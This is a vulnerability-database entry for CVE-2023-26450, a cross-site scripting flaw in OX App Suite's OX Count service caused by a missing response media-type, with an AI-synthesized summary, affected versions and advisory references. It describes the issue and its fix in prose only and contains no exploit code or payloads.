CVE-2023-26450
Description
The "OX Count" web service did not specify a media-type when processing responses by external resources. Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface and API. To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. We are now defining the accepted media-type to avoid code execution. No publicly available exploits are known.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OX Count web service lacked a media-type specification on external resources, enabling XSS that could lead to session hijacking or unauthorized actions.
Vulnerability
The OX Count web service, part of the OX App Suite, fails to specify a media-type when processing responses from external resources. This vulnerability affects versions prior to the fix released in 2023. An attacker can inject malicious script code that executes within the victim's browser context. The issue is described in the official advisory and external references [1].
Exploitation
An attacker requires temporary access to the user's account or must lure a user to interact with a compromised account. The exploit involves the attacker providing a crafted external resource that, when processed by the OX Count service, returns script code. The lack of a defined media-type allows the browser to interpret the response as executable script, leading to code execution in the victim's session [1]. No public exploit code is known, and the attack depends on user interaction or prior account access.
Impact
Successful exploitation results in arbitrary script execution within the victim's browser. This can lead to session hijacking, allowing the attacker to impersonate the user and trigger unwanted actions via the web interface and API. The impact is a compromise of confidentiality and integrity, with the attacker able to perform actions with the victim's privileges [1].
Mitigation
The vendor has addressed the vulnerability by defining the accepted media-type for external resource responses to prevent code execution. The fix was released in 2023. Users should update to the latest version of OX App Suite. No workarounds are detailed, and the CVE is not listed in the KEV catalog. For further details, refer to the vendor advisory and Packet Storm reference [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3- Range: <7.10.6 Patch 6230
- Range: <7.10.6 Patch 6230
- OX Software GmbH/OX App Suitev5Range: 0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4- documentation.open-xchange.com/appsuite/security/advisories/csaf/2023/oxas-adv-2023-0003.jsonmitrevendor-advisory
- software.open-xchange.com/products/appsuite/doc/Release_Notes_for_Patch_Release_6230_7.10.6_2023-05-02.pdfmitrerelease-notes
- packetstormsecurity.com/files/173943/OX-App-Suite-SSRF-SQL-Injection-Cross-Site-Scripting.htmlmitre
- seclists.org/fulldisclosure/2023/Aug/8mitre
News mentions
0No linked articles in our index yet.